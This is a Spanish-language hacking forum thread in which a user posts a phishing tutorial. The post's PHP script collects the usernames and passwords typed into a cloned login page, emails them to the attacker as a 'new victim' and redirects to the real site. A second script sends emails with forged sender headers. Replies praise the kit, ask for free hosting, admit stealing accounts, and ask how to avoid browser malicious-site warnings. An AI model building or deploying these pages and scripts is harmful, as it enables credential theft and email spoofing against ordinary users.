Tutorial phishing

Iniciado por rollth, Noviembre 12, 2014, 08:18:37 AM

Tema anterior - Siguiente tema

0 Miembros y 5 Visitantes están viendo este tema.

Noviembre 12, 2014, 08:18:37 AM Ultima modificación: Abril 01, 2018, 10:23:34 AM por rollth
Buenos dias/tardes/noches.

Os traigo un pequeño tutorial de como hacer phishing, aclaro que he seleccionado una pagina aleatoria.

Lo primero es irnos a la contraseña y darle a inspeccionar elemento.



Buscamos el form y le añadimos un action="scam.php"



Copiamos el codigo html en un archivo html y con codificacion UFT-8

En la misma carpeta donde tenemos el archivo html creamos un php con el siguiente codigo (en UFT-8 tambien):

Código: php
<?php

$user = trim($_POST['el name del input del user']);
$password = trim($_POST['el name del input de pass']);

$correoreceptor = "aquí cámbialo y pon tu correo";
$asunto = "Ha caido una nueva víctima";
$mensaje = "Usuario: ".$user."  -  Contraseña: ".$password;

mail($correoreceptor, $asunto, $mensaje);
header('Location: Pagina real');

?>


Ya solo hace falta buscar un host gratis y subirlo todo

Asi quedaria la pagina falsa



Y nos mandaria todos los logs a nuestro correo electronico :)

EDITO

He tenido varios problemas de los cuales solo aviso y no voy a explicar como librarse.

1º css en archivo en lugar de en html, tendreis que descargarlo para que la pagina quede exactamente igual.

2º script para impedir escribir en <input name="password"> en caso de estar en otra web, tendreis que borrar el script.

EDITO

Voy a explicar como hacer un panel para que mande un correo a donde tu quieras (Se suele usar mucho en el phishing)

lo primero es el codigo html al que llamaremos index.html

Código: html5
<html>
<head>
</head>
<body>
<div>
<h1>Phishing Pagina</h1>
<p>Correo al que desea enviar el email:</p>
<form action="correof.php" method="post">
<input name="correof" type="text">
<button type="submit">Enviar</button>
</form>
</div>
</body>
</html>


Creamos un .php con este codigo (se llamara correof):

Código: php
<?php

$correoreceptor = trim($_POST['correof']);
$asunto = "Asunto del correo";
$mensaje = 'Codigo html del cuerpo';
$cabeceras  = 'MIME-Version: 1.0' . "\r\n";
$cabeceras .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$cabeceras .= 'From: Nombre del que se envia <Correo del que se envia>' . "\r\n";

mail($correoreceptor, $asunto, $mensaje, $cabeceras);



?>


También me pueden seguir en Twitter si les hace ilusión: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos
RollthBuen hacker mejor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Gracias por el tutorial.

Sencillo pero más de uno caerá en algo así.

buen post, algo por donde comenzar.

Toda una pasada el code si que esta bueno :D gracias

genial bro, sencillo, rapido y eficaz, estupendo trabajo, gracias por compartirlo, saludos

Modificado explicando como hacer un panel.
RollthBuen hacker mejor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Hubiera sido bueno un vídeo para los novatos.

Pero de todas maneras excelente  8)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hubiera sido bueno un vídeo para los novatos.

Pero de todas maneras excelente  8)

Intente explicar de forma que cualquier persona que no sepa entendiera, si tienes algun problema contactame.
RollthBuen hacker mejor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hubiera sido bueno un vídeo para los novatos.

Pero de todas maneras excelente  8)
;)

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hubiera sido bueno un vídeo para los novatos.

Pero de todas maneras excelente  8)
;)

No creo que a la gente les sea muy util si no compartes el run.bat

Otra cosa es que en lugar de direccionar a forbiden 403 podrias redireccionar a la pagina real para que crea que ha sido un error y entonces entre normalmente.
RollthBuen hacker mejor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Mira por donde va a haber un segundo Facebook jajaja excelente tutorial. ]

Enviado desde mi LG-E400 usando Tapatalk 2


Gracias bro, simple pero más de uno cae, saludos.
El unico pez que nada con la corriente, es el pez muerto.

Marzo 31, 2015, 02:39:00 AM #12 Ultima modificación: Enero 17, 2016, 10:40:43 PM por EPSILON
Buena info.! esa es la idea básica de un Scam, el resto es pura imaginación...

Muy buen aporte!
¿Alguien podría decirme algún host gratuito recomendable?

Saludos.

Yo el año pasado me pasaba el dia haciendo esto jajaja. Estos fakes son muy útiles para robarte unas cuentas.

Noviembre 25, 2015, 06:15:08 PM #15 Ultima modificación: Noviembre 25, 2015, 06:16:54 PM por Xlitec0d3
Yo tengo hecho un panel para enviar emails: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Tiene contraseña, que es... : Underc0deano

Si lo se... original.
Provadlo y me decis.
: D

Bueno, mas que un panel de control para phishing es un fake email :D
RollthBuen hacker mejor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

hola amigos soy nuevo en este grupo pero empiezo así  tengo scrips de phishing el cual aceptan solo cualquiera no verdaderos pero e visto que hay scrip de phishing que solo aceptan veradaderos como seria para configurarlos espero que respondan pronto

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
hola amigos soy nuevo en este grupo pero empiezo así  tengo scrips de phishing el cual aceptan solo cualquiera no verdaderos pero e visto que hay scrip de phishing que solo aceptan veradaderos como seria para configurarlos espero que respondan pronto

Por favor,edita tu post y redacta un texto que se entienda, qué es lo que tienes y qué quieres. El foro tiene corrector ortográfico también.
Es casi ilegible/incomprensible lo que has escrito.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Gracias

Gabriela
Tú te enamoraste de mi valentía, yo me enamoré de tu oscuridad; tú aprendiste a vencer tus miedos, yo aprendí a no perderme en tu abismo.

hola buenas estos phishing   

¿son detectados  por google chrome como pagina maliciosa?

no tendría ningún sentido hacer lo pasos  lograr montarlo en un servidor gratuito
para que al final cuando se lo envíes ala victima salga pagina maliciosa
ya que ninguna persona caería en la trampa